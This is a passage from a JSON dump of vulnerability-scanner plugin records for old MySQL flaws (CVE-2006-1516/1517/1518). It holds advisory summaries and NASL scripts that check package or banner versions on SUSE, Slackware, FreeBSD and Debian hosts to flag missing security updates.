rpm_check( reference:\"mysql-4.1.13-3.4\", release:\"SUSE10.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-4.0.18-32.23\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-Max-4.0.18-32.26\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-4.0.21-4.8\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-Max-4.0.21-4.8\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-4.1.10a-3.6\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-Max-4.1.10a-3.6\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:17", "description": "New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2 may\npossibly leak sensitive information found in uninitialized memory to\nauthenticated users. The MySQL package previously in Slackware\n-current also suffered from these flaws, but an additional overflow\ncould allow arbitrary code execution. Since the vulnerabilities\nrequire a valid login and/or access to the database server, the risk\nis moderate. 
Slackware does not provide network access to a MySQL\ndatabase by default.", "edition": 23, "published": "2006-05-13T00:00:00", "title": "Slackware 10.2 / current : mysql (SSA:2006-129-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-05-13T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.2", "p-cpe:/a:slackware:slackware_linux:mysql"], "id": "SLACKWARE_SSA_2006-129-02.NASL", "href": "https://www.tenable.com/plugins/nessus/21345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2006-129-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21345);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_xref(name:\"SSA\", value:\"2006-129-02\");\n\n script_name(english:\"Slackware 10.2 / current : mysql (SSA:2006-129-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2 may\npossibly leak sensitive information found in uninitialized memory to\nauthenticated users. The MySQL package previously in Slackware\n-current also suffered from these flaws, but an additional overflow\ncould allow arbitrary code execution. 
Since the vulnerabilities\nrequire a valid login and/or access to the database server, the risk\nis moderate. Slackware does not provide network access to a MySQL\ndatabase by default.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.507293\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec112a5f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected mysql package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 
audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"10.2\", pkgname:\"mysql\", pkgver:\"4.1.19\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"mysql\", pkgver:\"5.0.21\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T04:12:30", "description": "The version of MySQL installed on the remote host is earlier than\n4.0.27 / 4.1.19 / 5.0.21. As such, it is potentially affected by the\nfollowing vulnerabilities :\n\n - A remote attacker may be able to read portions of memory\n by sending a specially crafted login packet in which the\n username does not have a trailing NULL. (CVE-2006-1516)\n\n - A remote attacker may be able to read portions of memory\n by sending a specially crafted COM_TABLE_DUMP request \n with an incorrect packet length. (CVE-2006-1517)\n\n - A buffer overflow in the 'open_table()' function could \n allow a remote, authenticated attacker to execute \n arbitrary code via specially crafted COM_TABLE_DUMP \n packets. 
(CVE-2006-1518)", "edition": 29, "published": "2011-11-18T00:00:00", "title": "MySQL < 4.0.27 / 4.1.19 / 5.0.21 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:mysql:mysql"], "id": "MYSQL_5_0_21.NASL", "href": "https://www.tenable.com/plugins/nessus/17697", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17697);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(17780);\n script_xref(name:\"CERT\", value:\"602457\");\n\n script_name(english:\"MySQL < 4.0.27 / 4.1.19 / 5.0.21 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of MySQL Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL installed on the remote host is earlier than\n4.0.27 / 4.1.19 / 5.0.21. As such, it is potentially affected by the\nfollowing vulnerabilities :\n\n - A remote attacker may be able to read portions of memory\n by sending a specially crafted login packet in which the\n username does not have a trailing NULL. (CVE-2006-1516)\n\n - A remote attacker may be able to read portions of memory\n by sending a specially crafted COM_TABLE_DUMP request \n with an incorrect packet length. (CVE-2006-1517)\n\n - A buffer overflow in the 'open_table()' function could \n allow a remote, authenticated attacker to execute \n arbitrary code via specially crafted COM_TABLE_DUMP \n packets. 
(CVE-2006-1518)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/432734/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL version 4.0.27 / 4.1.19 / 5.0.21 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_require_keys(\"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"mysql_func.inc\");\n\n\n# nb: banner checks of open source software are prone to false-\n# positives so only run the check if reporting is paranoid.\nif (report_paranoia < 2)\n exit(1, \"This plugin only runs if 'Report paranoia' is set to 'Paranoid'.\");\n\nport = get_service(svc:\"mysql\", default:3306, exit_on_fail:TRUE);\n\nif (!mysql_init(port:port, exit_on_fail:TRUE) == 1) \n exit(1, \"Can't establish a connection to the MySQL server listening on port \"+port+\".\");\n\nversion = mysql_get_version();\nmysql_close();\nif (!strlen(version)) exit(1, \"Can't get the version of the MySQL server listening on port \"+port+\".\");\n\nif (\n version =~ \"^4\\.0\\.([01]?[0-9]|2[0-6])($|[^0-9])\" ||\n version =~ \"^4\\.1\\.(0?[0-9]|1[0-8])($|[^0-9])\" ||\n version =~ \"^5\\.0\\.([01]?[0-9]|20)($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : 4.0.27 / 4.1.19 / 5.0.21' +\n '\\n';\n datadir = get_kb_item('mysql/' + port + '/datadir');\n if (!empty_or_null(datadir))\n {\n report += ' Data Dir : ' + datadir + '\\n';\n }\n databases = get_kb_item('mysql/' + port + '/databases');\n if (!empty_or_null(databases))\n { \n report += ' Databases :\\n' + databases;\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, \"The MySQL \"+version+\" server listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:42:53", "description": "Secunia reports :\n\nMySQL have some vulnerabilities, which can be exploited by malicious\nusers to disclose potentially sensitive information and 
compromise a\nvulnerable system.\n\n1) An error within the code that generates an error response to an\ninvalid COM_TABLE_DUMP packet can be exploited by an authenticated\nclient to disclosure certain memory content of the server process.\n\n2) A boundary error within the handling of specially crafted invalid\nCOM_TABLE_DUMP packets can be exploited by an authenticated client to\ncause a buffer overflow and allows arbitrary code execution.\n\n3) An error within the handling of malformed login packets can be\nexploited to disclosure certain memory content of the server process\nin the error messages.", "edition": 25, "published": "2006-06-05T00:00:00", "title": "FreeBSD : MySQL -- Information Disclosure and Buffer Overflow Vulnerabilities (4913886c-e875-11da-b9f4-00123ffe8333)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-06-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:mysql-server", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_4913886CE87511DAB9F400123FFE8333.NASL", "href": "https://www.tenable.com/plugins/nessus/21633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21633);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_xref(name:\"CERT\", value:\"602457\");\n script_xref(name:\"Secunia\", value:\"19929\");\n\n script_name(english:\"FreeBSD : MySQL -- Information Disclosure and Buffer Overflow Vulnerabilities (4913886c-e875-11da-b9f4-00123ffe8333)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Secunia reports :\n\nMySQL have some 
vulnerabilities, which can be exploited by malicious\nusers to disclose potentially sensitive information and compromise a\nvulnerable system.\n\n1) An error within the code that generates an error response to an\ninvalid COM_TABLE_DUMP packet can be exploited by an authenticated\nclient to disclosure certain memory content of the server process.\n\n2) A boundary error within the handling of specially crafted invalid\nCOM_TABLE_DUMP packets can be exploited by an authenticated client to\ncause a buffer overflow and allows arbitrary code execution.\n\n3) An error within the handling of malformed login packets can be\nexploited to disclosure certain memory content of the server process\nin the error messages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wisec.it/vulns.php?page=7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wisec.it/vulns.php?page=8\"\n );\n # http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html\"\n );\n # http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.vuxml.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html\"\n );\n # https://vuxml.freebsd.org/freebsd/4913886c-e875-11da-b9f4-00123ffe8333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?01ec0ec8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"mysql-server>4.0<4.0.27\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql-server>4.1<4.1.19\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql-server>5.1<=5.1.9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:35", "description": "Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. 
The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3", "edition": 25, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1071-1 : mysql - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-10-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mysql", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-1071.NASL", "href": "https://www.tenable.com/plugins/nessus/22613", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1071. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22613);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850, 17780);\n script_xref(name:\"DSA\", value:\"1071\");\n\n script_name(english:\"Debian DSA-1071-1 : mysql - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1071\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the mysql packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libmysqlclient10\", reference:\"3.23.49-8.15\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libmysqlclient10-dev\", reference:\"3.23.49-8.15\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mysql-client\", reference:\"3.23.49-8.15\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mysql-common\", reference:\"3.23.49-8.15\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mysql-doc\", reference:\"3.23.49-8.5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mysql-server\", reference:\"3.23.49-8.15\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:35", "description": "Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. 
The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3", "edition": 25, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1073-1 : mysql-dfsg-4.1 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-10-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mysql-dfsg-4.1", "cpe:/o:debian:debian_linux:3.1"], "id": "DEBIAN_DSA-1073.NASL", "href": "https://www.tenable.com/plugins/nessus/22615", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1073. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22615);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850, 17780);\n script_xref(name:\"CERT\", value:\"602457\");\n script_xref(name:\"DSA\", value:\"1073\");\n\n script_name(english:\"Debian DSA-1073-1 : mysql-dfsg-4.1 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366043\"\n );\n script_set_attribute(\n 
